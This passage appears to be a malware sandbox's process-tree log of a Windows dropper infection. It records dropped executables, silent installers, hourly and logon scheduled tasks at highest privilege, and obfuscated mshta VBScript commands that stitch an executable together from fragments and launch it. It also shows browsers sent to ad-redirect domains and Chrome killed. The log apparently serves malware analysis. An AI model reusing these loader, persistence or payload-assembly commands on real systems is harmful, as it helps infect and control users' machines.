C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ff61e539e70,0x7ff61e539e80,0x7ff61e539e9012⤵PID:3296
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,3952657481001276805,10154194870497491833,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4468_1181016857" --mojo-platform-channel-handle=1740 /prefetch:811⤵PID:3968
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\S1T7xVIJa2NgRifld8Xt4mJM.exe"C:\Users\Admin\Pictures\Adobe Films\S1T7xVIJa2NgRifld8Xt4mJM.exe"8⤵PID:6224
-
C:\Users\Admin\AppData\Local\Temp\is-LO4Q4.tmp\S1T7xVIJa2NgRifld8Xt4mJM.tmp"C:\Users\Admin\AppData\Local\Temp\is-LO4Q4.tmp\S1T7xVIJa2NgRifld8Xt4mJM.tmp" /SL5="$10414,506127,422400,C:\Users\Admin\Pictures\Adobe Films\S1T7xVIJa2NgRifld8Xt4mJM.exe"9⤵PID:5708
-
C:\Users\Admin\AppData\Local\Temp\is-NR2J0.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-NR2J0.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
PID:6656 -
C:\Users\Admin\AppData\Local\Temp\fa-e20e9-a39-ffa88-e2c0d8208e96e\Vaefaeshamasu.exe"C:\Users\Admin\AppData\Local\Temp\fa-e20e9-a39-ffa88-e2c0d8208e96e\Vaefaeshamasu.exe"11⤵PID:6468
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kmlzuqbx.lkd\GcleanerEU.exe /eufive & exit12⤵PID:10792
-
C:\Users\Admin\AppData\Local\Temp\kmlzuqbx.lkd\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kmlzuqbx.lkd\GcleanerEU.exe /eufive13⤵PID:11560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11560 -s 24014⤵
- Program crash
- Enumerates system info in registry
PID:9864
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\installer.exe /qn CAMPAIGN="654" & exit12⤵PID:7640
-
C:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\installer.exeC:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\installer.exe /qn CAMPAIGN="654"13⤵
- Enumerates connected drives
PID:11328 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635139627 /qn CAMPAIGN=""654"" " CAMPAIGN="654"14⤵PID:11860
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exe & exit12⤵PID:11856
-
C:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exeC:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exe13⤵PID:10788
-
C:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exe"C:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exe" -u14⤵PID:4044
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5caynxju.3ib\gcleaner.exe /mixfive & exit12⤵PID:9812
-
C:\Users\Admin\AppData\Local\Temp\5caynxju.3ib\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\5caynxju.3ib\gcleaner.exe /mixfive13⤵PID:9156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9156 -s 24014⤵
- Program crash
- Enumerates system info in registry
PID:11012
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pqrxobxt.bss\autosubplayer.exe /S & exit12⤵PID:1224
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:7792
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:3588 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
PID:5672
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5448
-
-
-
C:\Users\Admin\Pictures\Adobe Films\5jWUy2pAopKponnGFDTz_bfA.exe"C:\Users\Admin\Pictures\Adobe Films\5jWUy2pAopKponnGFDTz_bfA.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2176 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:6052
-
-
-
C:\Users\Admin\Pictures\Adobe Films\YgIqEx4XFbtnbNHkQWDzV0CA.exe"C:\Users\Admin\Pictures\Adobe Films\YgIqEx4XFbtnbNHkQWDzV0CA.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5952
-
-
C:\Users\Admin\Pictures\Adobe Films\eOX7_Qwa7pGMEb9wbMNxU4JT.exe"C:\Users\Admin\Pictures\Adobe Films\eOX7_Qwa7pGMEb9wbMNxU4JT.exe"6⤵PID:5972
-
-
C:\Users\Admin\Pictures\Adobe Films\wbRhqAkI0KanJbU9cRxvnLg2.exe"C:\Users\Admin\Pictures\Adobe Films\wbRhqAkI0KanJbU9cRxvnLg2.exe"6⤵
- Executes dropped EXE
PID:5196
-
-
C:\Users\Admin\Pictures\Adobe Films\MQe2V0B0vbPkFUADTZlxPeHQ.exe"C:\Users\Admin\Pictures\Adobe Films\MQe2V0B0vbPkFUADTZlxPeHQ.exe"6⤵
- Executes dropped EXE
PID:6048 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
- Executes dropped EXE
PID:6504
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 19808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1528
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\q3Vj1b7oC9dYMEZqxFYOF5x3.exe"C:\Users\Admin\Pictures\Adobe Films\q3Vj1b7oC9dYMEZqxFYOF5x3.exe"6⤵PID:6168
-
-
C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe"C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe"6⤵
- Executes dropped EXE
PID:6444 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵PID:4736
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe" ) do taskkill -im "%~NxK" -F8⤵PID:6584
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "NWXhkOhPxmA8QsCp0Poyf13J.exe" -F9⤵
- Kills process with taskkill
PID:904
-
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵PID:5200
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵PID:5256
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵PID:2212
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )10⤵PID:4660
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵PID:5032
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵PID:5724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵PID:7188
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵
- Loads dropped DLL
PID:7288
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\8Px0xZGNRC1ER0CeVlJC0xnq.exe"C:\Users\Admin\Pictures\Adobe Films\8Px0xZGNRC1ER0CeVlJC0xnq.exe"6⤵
- Executes dropped EXE
PID:6836 -
C:\Users\Admin\AppData\Local\Temp\is-KA45E.tmp\8Px0xZGNRC1ER0CeVlJC0xnq.tmp"C:\Users\Admin\AppData\Local\Temp\is-KA45E.tmp\8Px0xZGNRC1ER0CeVlJC0xnq.tmp" /SL5="$202EE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\8Px0xZGNRC1ER0CeVlJC0xnq.exe"7⤵
- Loads dropped DLL
PID:6236 -
C:\Users\Admin\AppData\Local\Temp\is-B6HBL.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-B6HBL.tmp\DYbALA.exe" /S /UID=27108⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:6120 -
C:\Program Files\Windows Sidebar\ZJHVIBCUGH\foldershare.exe"C:\Program Files\Windows Sidebar\ZJHVIBCUGH\foldershare.exe" /VERYSILENT9⤵PID:6388
-
-
C:\Users\Admin\AppData\Local\Temp\3f-fe243-5f2-f40b5-437db1a298253\Dogisholale.exe"C:\Users\Admin\AppData\Local\Temp\3f-fe243-5f2-f40b5-437db1a298253\Dogisholale.exe"9⤵PID:1928
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵PID:11668
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵PID:11852
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵PID:7988
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵PID:6180
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148310⤵PID:10236
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵PID:10280
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151310⤵PID:5676
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x78,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵PID:4876
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721510⤵PID:9616
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵PID:6088
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\11-3c477-76a-96e97-aadf98adae467\Punyrazhewy.exe"C:\Users\Admin\AppData\Local\Temp\11-3c477-76a-96e97-aadf98adae467\Punyrazhewy.exe"9⤵PID:3020
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit10⤵PID:7476
-
C:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\setting.exeC:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\setting.exe SID=778 CID=778 SILENT=1 /quiet11⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:9328 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635139627 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"12⤵PID:8320
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tyv0mwik.qlz\GcleanerEU.exe /eufive & exit10⤵PID:9124
-
C:\Users\Admin\AppData\Local\Temp\tyv0mwik.qlz\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\tyv0mwik.qlz\GcleanerEU.exe /eufive11⤵PID:10004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10004 -s 23612⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4200
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\installer.exe /qn CAMPAIGN="654" & exit10⤵PID:9188
-
C:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\installer.exeC:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\installer.exe /qn CAMPAIGN="654"11⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:10272 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635139627 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵PID:8740
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exe & exit10⤵PID:9296
-
C:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exeC:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exe11⤵PID:10036
-
C:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exe"C:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exe" -u12⤵PID:10876
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwhurwrg.4ka\customer51.exe & exit10⤵PID:9512
-
C:\Users\Admin\AppData\Local\Temp\kwhurwrg.4ka\customer51.exeC:\Users\Admin\AppData\Local\Temp\kwhurwrg.4ka\customer51.exe11⤵PID:10440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eaupco50.avo\gcleaner.exe /mixfive & exit10⤵PID:9588
-
C:\Users\Admin\AppData\Local\Temp\eaupco50.avo\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\eaupco50.avo\gcleaner.exe /mixfive11⤵PID:9944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9944 -s 24812⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2016
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xcfshaqf.bkv\FastPC.exe /verysilent & exit10⤵PID:9852
-
C:\Users\Admin\AppData\Local\Temp\xcfshaqf.bkv\FastPC.exeC:\Users\Admin\AppData\Local\Temp\xcfshaqf.bkv\FastPC.exe /verysilent11⤵PID:10924
-
C:\Users\Admin\AppData\Local\Temp\is-2CSQR.tmp\FastPC.tmp"C:\Users\Admin\AppData\Local\Temp\is-2CSQR.tmp\FastPC.tmp" /SL5="$A01E8,138429,56832,C:\Users\Admin\AppData\Local\Temp\xcfshaqf.bkv\FastPC.exe" /verysilent12⤵
- Loads dropped DLL
PID:11200 -
C:\Users\Admin\AppData\Local\Temp\is-MR2GN.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MR2GN.tmp\Setup.exe" /Verysilent13⤵
- Drops file in Program Files directory
PID:3084 -
C:\Program Files (x86)\FastPc\FastPc\Faster.exe"C:\Program Files (x86)\FastPc\FastPc\Faster.exe"14⤵PID:6000
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6000 -s 76815⤵
- Program crash
PID:7984
-
-
-
C:\Program Files (x86)\FastPc\FastPc\FastPCV.exe"C:\Program Files (x86)\FastPc\FastPc\FastPCV.exe" /Verysilent14⤵PID:420
-
C:\Users\Admin\AppData\Local\Temp\is-4UNJA.tmp\FastPCV.tmp"C:\Users\Admin\AppData\Local\Temp\is-4UNJA.tmp\FastPCV.tmp" /SL5="$40324,138429,56832,C:\Program Files (x86)\FastPc\FastPc\FastPCV.exe" /Verysilent15⤵PID:5440
-
C:\Users\Admin\AppData\Local\Temp\is-3N736.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3N736.tmp\Setup.exe" /Verysilent16⤵PID:9480
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 88417⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:12172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 100417⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 101217⤵
- Program crash
- Enumerates system info in registry
PID:8820
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 109217⤵
- Program crash
- Enumerates system info in registry
PID:3500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 110817⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6048
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 108017⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 148817⤵
- Program crash
- Enumerates system info in registry
PID:9584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 177617⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 176417⤵
- Program crash
- Checks processor information in registry
PID:7448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 184017⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:10092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 131217⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:11512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 192017⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7892
-
-
-
-
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\System32\gpupdate.exe" /force14⤵PID:7908
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im chrome.exe14⤵PID:6796
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe15⤵
- Kills process with taskkill
PID:8416
-
-
-
C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"14⤵PID:1952
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\otokfwzd.lbp\installer.exe /qn CAMPAIGN=654 & exit10⤵PID:10076
-
C:\Users\Admin\AppData\Local\Temp\otokfwzd.lbp\installer.exeC:\Users\Admin\AppData\Local\Temp\otokfwzd.lbp\installer.exe /qn CAMPAIGN=65411⤵PID:11080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l3vtadfb.5ht\autosubplayer.exe /S & exit10⤵PID:9896
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WBiir5hGlETmLNsUlwQONX_F.exe"C:\Users\Admin\Pictures\Adobe Films\WBiir5hGlETmLNsUlwQONX_F.exe"6⤵
- Loads dropped DLL
PID:6352
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exeWed0971f17486f8.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4044 -
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exe6⤵
- Executes dropped EXE
PID:5312
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe4⤵PID:2244
-
